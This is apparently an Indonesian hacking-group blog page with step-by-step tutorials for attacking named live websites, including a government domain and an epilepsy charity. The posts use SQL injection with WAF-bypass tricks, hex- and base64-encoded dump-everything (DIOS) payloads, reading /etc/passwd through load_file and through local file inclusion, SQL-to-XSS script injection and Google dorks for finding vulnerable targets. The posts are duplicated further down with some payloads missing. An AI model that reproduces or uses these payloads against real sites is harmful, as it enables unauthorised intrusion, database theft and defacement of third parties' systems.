NexusCyberTeam

TUTORIAL SQL TO LFI

Assalamualaikum

Balik lagi ma gua Noub93 Gans*; Kali ini akan tutor Sql To Lfi

Bahan"

->Payload Lfi load_file('/etc/passwd')

-> Live Target : http://tf.lan.go.id/statis-1-profil.html

Lanjut aja ke tutor nya

Kayak biasa pertama" kita kasih ' untuk cek vuln atau tidak

http://tf.lan.go.id/statis-1'-profil.html

Nah kasih ' nya sesudah angka 1 ye:v

Terus lu searc ke google/crome maka akan menjadi seperti ini

Lalu kalian tambahin order by nya

Contoh : http://tf.lan.go.id/statis-1'+order+by+1--+--profil.html

Maka akan menjadi seperti ini

Nah disini error,lalu langsng aja ganti order by nya menjadi union select

Contoh : http://tf.lan.go.id/statis-1'+union+select--+--profil.html

Hapus aja angka 1 nya

Maka akan menjadi seperti ini

Nah,lalu kalian masukin payload nya

Contoh : http://tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html

Nah maka akan menjadi seperti ini

Nah sudah itu kalian tinggal view-source aja biar muncul hasilnya:v

Contoh : view-source:tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html

Nah maka akan menjadi seperti ini

Duar boom:v

Oke begitu ya

Sekian tutor nya jika ada kesalahan moon maaf:v

Jangan lupa follow ig @nexuscyberteam

ThanksTo : Dark_193N - Akshan - Badboy - Dan all Member NCT

#Nexus Cyber Team

LOCAL FILE INCLUSION (LFI) #1

Assalamualaikum

Balik lagi ma gua Noub93 Gans:v, Mengtutor Local File Inclusion (LFI) #1

Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionality that dynamically includes local files or scripts. The consequences of a successful LFI attack include Directory Traversal and Information Disclosure as well as Remote Code Execution.

Typically, Local File Inclusion (LFI) occurs, when an application gets the path to the file that has to be included as an input without treating it as untrusted input. This would allow a local file to be supplied to the included statemen

Local File Inclusion is very much like Remote File Inclusion (RFI), with the difference that with Local File Inclusion, an attacker can only include local files (not remote files like in the case of RFI).t.FI).

LANJUT AE KE TUTOR:V

Bahan"

->Exploit :

-‎ /etc/passwd

-‎ /etc/resolv.conf

-‎ /proc/version

-‎ /etc/resolv.

-‎ /proc/version

->Live Target : https://lab.fotoforensics.com/faq.php?

Maka tampilan seperti ini

Itu tampilan awal belom di apa"in:v

Lanjut....

Sebelum lu kasih Exploit,lu kasih page / show dulu

Contoh : https://lab.fotoforensics.com/faq.php?show=

https://lab.fotoforensics.com/faq.php?page=

Nah seperti itu

Oke lanjut,sekarang lu tambahin aja Exploit nya bebas...

Contoh : /etc/passwd

Contoh gua pake yang show=

Jadi https://lab.fotoforensics.com/faq.php?show=/etc/passwd

Maka hasilnya akan menjadi seperti ini

Nah seperti itu, selesai dech,tamat:v

Sekian dan jika ada kesalahan moon maaf

Gua manusia biasa jadi suka khilaf:v

Wassalamu'alaikum

ThanksTo : Dark_193N,Badboy,Akhsan,Killermoon And -> All Member NCT

#Nexus Cyber Team

TUTORIAL SQL STRUCTURED QUERY LOVE CHALL

Assalamualaikum

Balik lagi sama gua Noub93 Gans:v Kali ini seperti biasa mengtutor:v SQL STRUCTURED QUERY LOVE CHALL

Bahan"

->Dios

->Bypas wap

AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/

Chall/live target : http://www.icdcprague.org/index.php?id=-40

Lanjut ae ke tutor nya

Pertama" kalian tempel ae chall/live target tadi di google atau crome:v

Nah muncul tampilan awal seperti itu

Oke sekarang kita cek vuln atau tidak,dengan cara tambahin ' sesudah param/id

Contoh : http://www.icdcprague.org/index.php?id=40'

Maka akan seperti ini

Nah itu Vuln....

Lanjut klean tambahin order by nya

http://www.icdcprague.org/index.php?id=40'+order+by+1--+-

Maka muncul seperti ini

Oke kembali ke halaman semula

Kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Oke percepat gua nemu yg eror di angka 7

Nah,otomatis angka togel nya ada di angka 6

Cara mencari angka togel nya kita ganti

Order+by menjadi union+select

Karna web ini harus pake bypas wap jadi kita gunain bypas wap

AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/

Contoh : http://www.icdcprague.org/index.php?id=-40'+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,4,5,6--+-

Nah maka akan menjadi seperti ini

Nah muncul angka togel nya kalian tinggal tempel aja dios di angka togel nya

Dan boom jadi hasil nya

Oke sekian dan jika ada kesalahan mohon maaf:)

Wassalamu'alaikum

ThanksTo : Dark_193N,Akhsan,Badboy, Killermoon

#Nexus Cyber Team

TUTORIAL SQL PARAMETER HTML

Assalamualaikum

Gua Noub93 Gans:v Kali ini akan mengtutor Sql Parameter Html

Bahan"

->Dios

->Kuota -_

Live Target : https://kramatdjati-garuda.com/statis-1-profil.html

Langsng aja tempel di crome atau google

Nah itu tampilan semula,belom di apa"in:v

Oke lanjut kita cek vuln atau tidak dengan cara Tambahin ' sesudah angka 1

Maka tampilan akan menjadi seperti ini

Nah itu tandanya Vuln Sql

Oke lanjut ke order by nya

Contoh :

https://kramatdjati-garuda.com/statis-1'+order+by+1--+--profil.html

Nah seperti itu,maka tampilan akan menjadi seperti ini

Nah kembali kesemula lagi...

Lalu kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Prcepat ae.....

Disini gua nemu error nya di angka 8

Contoh : https://kramatdjati-garuda.com/statis-1'+order+by+8--+--profil.html

Nah maka tampilan akan menjadi seperti ini

Nah sekarang lanjut ke union select nya

Nah kan tadi error nya di angka 8,jadi sudah pasti angka ajaib/togel di angka 7

Cara untuk nemuin nya begini

Contoh : https://kramatdjati-garuda.com/statis--1'+union+select+1,2,3,4,5,6,7--+--profil.html

Jangan lupa kasi - sebelum angka 1 ye.....

Oke lanjut maka tampilan akan menjadi seperti ini

Nah angka togel nya muncul,tinggal tempel aja dioa di no togelnya

Contoh :

https://kramatdjati-garuda.com/statis--1'+AND+1=0+UNION+SELECT+1,CoNcAt/**/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f672e746f7034746f702e696f2f705f313838373771636868322e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e272c274e6f756239332047616e73272c273c2f666f6e743e272c273c2f62723e3c696672616d652077696474683d22302522206865696768743d223022207363726f6c6c696e673d226e6f22206672616d65626f726465723d226e6f22206c6f6f703d22747275652220616c6c6f773d226175746f706c617922207372633d2268747470733a2f2f612e746f7034746f702e696f2f6d5f31383933777971796b302e6d7033223e3c2f696672616d653e,database(),version(),sysdate(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,@@Hostname,5,6,7--+--profil.html

Maka hasil nya :

Gua Noub93,Sekian Terimakasih:v

Wassalamu'alaikum

Thankto : Dark_193N,Akhsan,Killermoon,Badboy

#Nexus Cyber Team

TUTORIAL SQL TO XSS

Assalamualaikum

Balik lagi sama gua Noub93 kali ini gua bakal kasih tutorial SQL TO XSS

Bahan²

-chall

-payload = CoNcAt/**/(0x3c7363726970743e70726f6d70742822,0x4e6f756239332047616e73,0x7c7c,user/**/(),0x7c7c,version(),0x7c7c,database/**8**/(),0x7c7c,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x7c7c,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e)

Live Target :

https://www.epilepsymichigan.org/page.php?id=365

Oke seperti biasa kita cek vuln atau tidak dengan cara tambahin '

Nah kaya gitu ,vuln oke lanjut....

Nah error ya oke lanjut ke order by

order by 1--+-

order by 2--+-

order by 3--+-

Sampe nemu yang error

Nah gua nemu yang error di angka 11

Langsung kita union select..... Biar nemu angka togel:v

Caranya : https://www.epilepsymichigan.org/page.php?id=-365%27+union+select+1,2,3,4,5,6,7,8,9,10--+-

Jangan lupa tambahin - sesudah param / id=

Biar nemu angka togel:v

Nah angka togel nya ketemu, kita masukin payload ke angka togel nya

Contoh : https://www.epilepsymichigan.org/page.php?id=-365%27+union+select+1,CoNcAt/**/(0x3c7363726970743e70726f6d70742822,0x4e6f756239332047616e73,0x7c7c,user/**/(),0x7c7c,version(),0x7c7c,database/**8**/(),0x7c7c,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x7c7c,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e),3,4,5,6,7,8,9,10--+-

Nah seperti itu ....

Hasilnya :

Oke cukup sekian Terimakasih Bila ada kesalahan maaf:)

Wassalamu'alaikum

#Nexus Cyber Team

Tutorial SQL BASE64 EASY

Assalamualaikum

Lanjut lagi bersama Noub93 Gans :v

Akan kasih tutor Base64 Ez-_

Alat tempur :

-> Apk Codec (download di play store)

-> Dork :

Inurl:/php?id=MQ==

Inurl:/php?Id=NQ==

Inurl:/php?id=NW==

-> Dios

Live Target : http://www.knotsolutions.com/job.php?id=MQ==

Oke seperti biasa kita cek vuln atau ngga nya

Cara cek vuln nya? Kalian buka terlebih dahulu apk codec

Kalian ganti Ascii jadi Base64

Jika sudah kalian tempel id nya tadi MQ==

Di kotak bawah

Nah terus kalian kasi tanda ' di angka 1

Lalu salin aja code yang muncul, yg gua buletin:v

Lalu tempel di http://www.knotsolutions.com/job.php?id=

Contoh : http://www.knotsolutions.com/job.php?id=MSc=

Lalu kalian tempel di google/crome untuk mengecek vuln atau tidak

Nah gambar akan menjadi seperti ini

Lalu kalian order by seperti biasa......

Cuma disini beda tidak memakai (+)

Contoh :

Kalian salin aja code nya lalu tempel lagi di id= contoh

http://www.knotsolutions.com/job.php?id=MSBvcmRlciBieSAxLS0gLQ==

Lalu tempel ke google/crome maka tampilan akan menjadi seperti

Oke lanjut ,kita ganti oder by menjadi union select

Tapi kita kasi - sesudah param .... Contoh

Lalu kalian salin lagi code dibawah nya tempel kan di id= atau param:v

Contoh : http://www.knotsolutions.com/job.php?id=LTEgdW5pb24gc2VsZWN0IDEsMiwzLS0gLQ==

Kalian cek kaya tadi biar nemu angka togel:v,maka tampilan akan menjadi seperti ini

Nah angka togel dah ketemu lngsng aja kalian tempel dios nya di angka togel tersebut

Contoh : gua memilih yang 2

Lalu kalian salin code dibawah tempel kan aja sesudah param atau id= (ngerti kan)

Contoh : http://www.knotsolutions.com/job.php?id=LTEgdW5pb24gc2VsZWN0IDEsQ29OY0F0LyoqOCoqKi8oMHgzYzYzNjU2ZTc0NjU3MjNlMjcyYzI3M2M2OTZkNjcyMDczNzI2MzNkMjI2ODc0NzQ3MDczM2EyZjJmNjcyZTc0NmY3MDM0NzQ2ZjcwMmU2OTZmMmY3MDVmMzEzODM4MzczNzcxNjM2ODY4MzIyZTcwNmU2NzIyMjA2ODY1Njk2NzY4NzQzZDIyMzMzMDMwNzA3ODIyMjA3NzY5NjQ3NDY4M2QyMjMzMzAzMDcwNzgyMjI3MmMyNzNjMmY2MzY1NmU3NDY1NzIzZTI3MmMyNzNjMmY2MjcyM2UyNzJjMjczYzY2NmY2ZTc0MjA2MzZmNmM2ZjcyM2QyMjYyNmM2MTYzNmIyMjIwNzM2OTdhNjUzZDIyMzUyNTIyM2UyNzJjMjc0ZTZmNzU2MjM5MzMyMDQ3NjE2ZTczMjcyYzI3M2MyZjY2NmY2ZTc0M2UyNzJjMjczYzJmNjI3MjNlM2M2OTY2NzI2MTZkNjUyMDc3Njk2NDc0NjgzZDIyMzAyNTIyMjA2ODY1Njk2NzY4NzQzZDIyMzAyMjIwNzM2MzcyNmY2YzZjNjk2ZTY3M2QyMjZlNmYyMjIwNjY3MjYxNmQ2NTYyNmY3MjY0NjU3MjNkMjI2ZTZmMjIyMDZjNmY2ZjcwM2QyMjc0NzI3NTY1MjIyMDYxNmM2YzZmNzczZDIyNjE3NTc0NmY3MDZjNjE3OTIyMjA3MzcyNjMzZDIyNjg3NDc0NzA3MzNhMmYyZjYxMmU3NDZmNzAzNDc0NmY3MDJlNjk2ZjJmNmQ1ZjMxMzgzOTMzNzc3OTcxNzk2YjMwMmU2ZDcwMzMyMjNlM2MyZjY5NjY3MjYxNmQ2NTNlCiwweDU1NTM0NTUyM2EzZSxjdXJyZW50X3VzZXIsMHgzYzYyNzIzZSwweDU2NDU1MjUzNDk0ZjRlM2EzZSx2ZXJzaW9uKCksMHgzYzYyNzIzZSwgMHg1MDRjNTU0NzQ5NGUzYTNlLEBAcGx1Z2luX2RpciwgMHgzYzYyNzIzZSwgMHg1MzU5NGQ0YzQ5NGU0YjNhM2UsQEBHTE9CQUwuaGF2ZV9zeW1saW5rLCAweDNjNjI3MjNlLCAweDQ4NGY1MzU0NGU0MTRkNDUzYTNlLEBAaG9zdG5hbWUsIDB4M2M2MjcyM2UsMHgzYzY2NmY2ZTc0MjA2MzZmNmM2ZjcyM2QyMjYyNmM3NTY1MjIzZSwoc2VsZWN0KEB4KS8qITUwMDAwRnJvbSovKC8qITUwMDAwc2VsZWN0Ki8oQHg6PTB4MDApLChzZWxlY3QoMCkvKiFGcm9tKi8oLyohNTAwMDBJbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyovKS8qITUwMDAwV2hlcmUqLyh0YWJsZV9zY2hlbWE9ZGF0YWJhc2UvKmRhdGEqLy8qKjgqKi8oKSlhbmQoMHgwMClpbihAeDo9LyohNTAwMDBjb05jYXQqLyhAeCwweDNjNmM2OTNlLC8qITUwMDAwdGFibGVfbmFtZSovLDB4M2EzYSwvKiE1MDAwMGNvbHVtbl9uYW1lKi8pKSkpeCkpCiwzLS0gLQ==

Nah kalian tempel aja di google/crome maka tampilan akan menjadi seperti ini

Oke sekian aja tutor dari gua,cukup sekian Terimakasih

#Nexus Cyber Team

Tutorial Sql local varielabel

Assalamualaikum

Disini gua Noub93 Gans akan mengtutor:v Sql Poc local variabel

Pertama" seperti biasa

Siapin alat" nya

-> dios

Live target : http://www.ampak.com.tw/product.php?id=21

Oke lanjut seperti biasa

Kita cek vuln atau tidak terlebih dahulu ,cara nya tambahin '

Nah itu Vuln,oke lanjut kita order+by--+-

Caranya

http://www.ampak.com.tw/product.php?id=21+order+by+1--+-

Kalian naikin terus angka nya sampe nemu yang error

Nah disini gua nemu yang error di angka 9

http://www.ampak.com.tw/product.php?id=21+order+by+9--+-

Nah berarti angka ajaib/togel nya di no 8 !!!

Cara manggil nya ?

Kalian ganti order+by jadi union+select

Karna itu harus pake bypas jadi gua gunain yang

AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+

Contoh : http://www.ampak.com.tw/product.php?id=21+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+1,2,3,4,5,6,7,8--+-

Nah angka togel nya muncul (3)

Oke lanjut..... Cara variabel nya ?

Kita tambahin and mod (9,9) div@nicklu:=dioslu

Ini lu tambahin habis angka parameter

Terus angka togel nya lu ganti jadi @nicklu

Contoh : http://www.ampak.com.tw/product.php?id=21+and%20mod%20(9,9)%20div@Noub93:=CoNcAt/**8***/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f692e6962622e636f2f637666376643732f32303230303630372d3232343531352e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e6f756239332047616e733c2f666f6e743e3c2f62723e3c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e65787573204379626572205465616d3c2f666f6e743e3c62723e,0x555345523a3e,current_user,0x3c62723e,0x56455253494f4e3a3e,version(),0x3c62723e,%200x504c5547494e3a3e,@@plugin_dir,%200x3c62723e,%200x53594d4c494e4b3a3e,@@GLOBAL.have_symlink,%200x3c62723e,%200x484f53544e414d453a3e,@@hostname,%200x3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x))+/*!50000UNION/****/*/+/*!50000SELECT/****/*/+1,2,@Noub93,4,5,6,7,8--+-

Hasil :

Jadi gitu tutor sql local variabel

Sekian Terimakasi:) Wassalamu'alaikum

#Nexus Cyber Team

Langganan: Postingan (Atom)

Minggu, 14 Maret 2021

TUTORIAL SQL TO LFI

Assalamualaikum

Balik lagi ma gua Noub93 Gans*; Kali ini akan tutor Sql To Lfi

Bahan"

->Payload Lfi load_file('/etc/passwd')

-> Live Target : http://tf.lan.go.id/statis-1-profil.html

Lanjut aja ke tutor nya

Kayak biasa pertama" kita kasih ' untuk cek vuln atau tidak

http://tf.lan.go.id/statis-1'-profil.html

Nah kasih ' nya sesudah angka 1 ye:v

Terus lu searc ke google/crome maka akan menjadi seperti ini

Lalu kalian tambahin order by nya

Contoh : http://tf.lan.go.id/statis-1'+order+by+1--+--profil.html

Maka akan menjadi seperti ini

Nah disini error,lalu langsng aja ganti order by nya menjadi union select

Contoh : http://tf.lan.go.id/statis-1'+union+select--+--profil.html

Hapus aja angka 1 nya

Maka akan menjadi seperti ini

Nah,lalu kalian masukin payload nya

Contoh : http://tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html

Nah maka akan menjadi seperti ini

Nah sudah itu kalian tinggal view-source aja biar muncul hasilnya:v

Contoh : view-source:tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html

Nah maka akan menjadi seperti ini

Duar boom:v

Oke begitu ya

Sekian tutor nya jika ada kesalahan moon maaf:v

Jangan lupa follow ig @nexuscyberteam

ThanksTo : Dark_193N - Akshan - Badboy - Dan all Member NCT

#Nexus Cyber Team

LOCAL FILE INCLUSION (LFI) #1

Assalamualaikum

Balik lagi ma gua Noub93 Gans:v, Mengtutor Local File Inclusion (LFI) #1

LANJUT AE KE TUTOR:V

Bahan"

->Exploit :

-‎ /etc/passwd

-‎ /etc/resolv.conf

-‎ /proc/version

-‎ /etc/resolv.

-‎ /proc/version

->Live Target : https://lab.fotoforensics.com/faq.php?

Maka tampilan seperti ini

Itu tampilan awal belom di apa"in:v

Lanjut....

Sebelum lu kasih Exploit,lu kasih page / show dulu

Contoh : https://lab.fotoforensics.com/faq.php?show=

https://lab.fotoforensics.com/faq.php?page=

Nah seperti itu

Oke lanjut,sekarang lu tambahin aja Exploit nya bebas...

Contoh : /etc/passwd

Contoh gua pake yang show=

Jadi https://lab.fotoforensics.com/faq.php?show=/etc/passwd

Maka hasilnya akan menjadi seperti ini

Nah seperti itu, selesai dech,tamat:v

Sekian dan jika ada kesalahan moon maaf

Gua manusia biasa jadi suka khilaf:v

Wassalamu'alaikum

ThanksTo : Dark_193N,Badboy,Akhsan,Killermoon And -> All Member NCT

#Nexus Cyber Team

Sabtu, 13 Maret 2021

TUTORIAL SQL STRUCTURED QUERY LOVE CHALL

Assalamualaikum

Balik lagi sama gua Noub93 Gans:v Kali ini seperti biasa mengtutor:v SQL STRUCTURED QUERY LOVE CHALL

Bahan"

->Dios

->Bypas wap

AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/

Chall/live target : http://www.icdcprague.org/index.php?id=-40

Lanjut ae ke tutor nya

Pertama" kalian tempel ae chall/live target tadi di google atau crome:v

Nah muncul tampilan awal seperti itu

Oke sekarang kita cek vuln atau tidak,dengan cara tambahin ' sesudah param/id

Contoh : http://www.icdcprague.org/index.php?id=40'

Maka akan seperti ini

Nah itu Vuln....

Lanjut klean tambahin order by nya

http://www.icdcprague.org/index.php?id=40'+order+by+1--+-

Maka muncul seperti ini

Oke kembali ke halaman semula

Kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Oke percepat gua nemu yg eror di angka 7

Nah,otomatis angka togel nya ada di angka 6

Cara mencari angka togel nya kita ganti

Order+by menjadi union+select

Karna web ini harus pake bypas wap jadi kita gunain bypas wap

AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/

Contoh : http://www.icdcprague.org/index.php?id=-40'+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,4,5,6--+-

Nah maka akan menjadi seperti ini

Nah muncul angka togel nya kalian tinggal tempel aja dios di angka togel nya

Dan boom jadi hasil nya

Oke sekian dan jika ada kesalahan mohon maaf:)

Wassalamu'alaikum

ThanksTo : Dark_193N,Akhsan,Badboy, Killermoon

#Nexus Cyber Team

TUTORIAL SQL PARAMETER HTML

Assalamualaikum

Gua Noub93 Gans:v Kali ini akan mengtutor Sql Parameter Html

Bahan"

->Dios

->Kuota -_

Live Target : https://kramatdjati-garuda.com/statis-1-profil.html

Langsng aja tempel di crome atau google

Nah itu tampilan semula,belom di apa"in:v

Oke lanjut kita cek vuln atau tidak dengan cara Tambahin ' sesudah angka 1

Maka tampilan akan menjadi seperti ini

Nah itu tandanya Vuln Sql

Oke lanjut ke order by nya

Contoh :

https://kramatdjati-garuda.com/statis-1'+order+by+1--+--profil.html

Nah seperti itu,maka tampilan akan menjadi seperti ini

Nah kembali kesemula lagi...

Lalu kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Prcepat ae.....

Disini gua nemu error nya di angka 8

Contoh : https://kramatdjati-garuda.com/statis-1'+order+by+8--+--profil.html

Nah maka tampilan akan menjadi seperti ini

Nah sekarang lanjut ke union select nya

Nah kan tadi error nya di angka 8,jadi sudah pasti angka ajaib/togel di angka 7

Cara untuk nemuin nya begini

Contoh : https://kramatdjati-garuda.com/statis--1'+union+select+1,2,3,4,5,6,7--+--profil.html

Jangan lupa kasi - sebelum angka 1 ye.....

Oke lanjut maka tampilan akan menjadi seperti ini

Nah angka togel nya muncul,tinggal tempel aja dioa di no togelnya

Contoh :

Maka hasil nya :

Gua Noub93,Sekian Terimakasih:v

Wassalamu'alaikum

Thankto : Dark_193N,Akhsan,Killermoon,Badboy

#Nexus Cyber Team

Rabu, 10 Maret 2021

TUTORIAL SQL TO XSS

Assalamualaikum

Balik lagi sama gua Noub93 kali ini gua bakal kasih tutorial SQL TO XSS

Bahan²

-chall

Live Target :

https://www.epilepsymichigan.org/page.php?id=365

Oke seperti biasa kita cek vuln atau tidak dengan cara tambahin '

Nah kaya gitu ,vuln oke lanjut....

Nah error ya oke lanjut ke order by

order by 1--+-

order by 2--+-

order by 3--+-

Sampe nemu yang error

Nah gua nemu yang error di angka 11

Langsung kita union select..... Biar nemu angka togel:v

Caranya : https://www.epilepsymichigan.org/page.php?id=-365%27+union+select+1,2,3,4,5,6,7,8,9,10--+-

Jangan lupa tambahin - sesudah param / id=

Biar nemu angka togel:v

Nah angka togel nya ketemu, kita masukin payload ke angka togel nya

Nah seperti itu ....

Hasilnya :

Oke cukup sekian Terimakasih Bila ada kesalahan maaf:)

Wassalamu'alaikum

#Nexus Cyber Team

Tutorial SQL BASE64 EASY

Assalamualaikum

Lanjut lagi bersama Noub93 Gans :v

Akan kasih tutor Base64 Ez-_

Alat tempur :

-> Apk Codec (download di play store)

-> Dork :

Inurl:/php?id=MQ==

Inurl:/php?Id=NQ==

Inurl:/php?id=NW==

-> Dios

Live Target : http://www.knotsolutions.com/job.php?id=MQ==

Oke seperti biasa kita cek vuln atau ngga nya

Cara cek vuln nya? Kalian buka terlebih dahulu apk codec

Kalian ganti Ascii jadi Base64

Jika sudah kalian tempel id nya tadi MQ==

Di kotak bawah

Nah terus kalian kasi tanda ' di angka 1

Lalu salin aja code yang muncul, yg gua buletin:v

Lalu tempel di http://www.knotsolutions.com/job.php?id=

Contoh : http://www.knotsolutions.com/job.php?id=MSc=

Lalu kalian tempel di google/crome untuk mengecek vuln atau tidak

Nah gambar akan menjadi seperti ini

Lalu kalian order by seperti biasa......

Cuma disini beda tidak memakai (+)

Contoh :

Kalian salin aja code nya lalu tempel lagi di id= contoh

http://www.knotsolutions.com/job.php?id=MSBvcmRlciBieSAxLS0gLQ==

Lalu tempel ke google/crome maka tampilan akan menjadi seperti

Oke lanjut ,kita ganti oder by menjadi union select

Tapi kita kasi - sesudah param .... Contoh

Lalu kalian salin lagi code dibawah nya tempel kan di id= atau param:v

Contoh : http://www.knotsolutions.com/job.php?id=LTEgdW5pb24gc2VsZWN0IDEsMiwzLS0gLQ==

Kalian cek kaya tadi biar nemu angka togel:v,maka tampilan akan menjadi seperti ini

Nah angka togel dah ketemu lngsng aja kalian tempel dios nya di angka togel tersebut

Contoh : gua memilih yang 2

Lalu kalian salin code dibawah tempel kan aja sesudah param atau id= (ngerti kan)

Nah kalian tempel aja di google/crome maka tampilan akan menjadi seperti ini

Oke sekian aja tutor dari gua,cukup sekian Terimakasih

#Nexus Cyber Team

Tutorial Sql local varielabel

Assalamualaikum

Disini gua Noub93 Gans akan mengtutor:v Sql Poc local variabel

Pertama" seperti biasa

Siapin alat" nya

-> dios

Live target : http://www.ampak.com.tw/product.php?id=21

Oke lanjut seperti biasa

Kita cek vuln atau tidak terlebih dahulu ,cara nya tambahin '

Nah itu Vuln,oke lanjut kita order+by--+-

Caranya

http://www.ampak.com.tw/product.php?id=21+order+by+1--+-

Kalian naikin terus angka nya sampe nemu yang error

Nah disini gua nemu yang error di angka 9

http://www.ampak.com.tw/product.php?id=21+order+by+9--+-

Nah berarti angka ajaib/togel nya di no 8 !!!

Cara manggil nya ?

Kalian ganti order+by jadi union+select

Karna itu harus pake bypas jadi gua gunain yang

AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+

Contoh : http://www.ampak.com.tw/product.php?id=21+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+1,2,3,4,5,6,7,8--+-

Nah angka togel nya muncul (3)

Oke lanjut..... Cara variabel nya ?

Kita tambahin and mod (9,9) div@nicklu:=dioslu

Ini lu tambahin habis angka parameter

Terus angka togel nya lu ganti jadi @nicklu

Hasil :

Jadi gitu tutor sql local variabel

Sekian Terimakasi:) Wassalamu'alaikum

#Nexus Cyber Team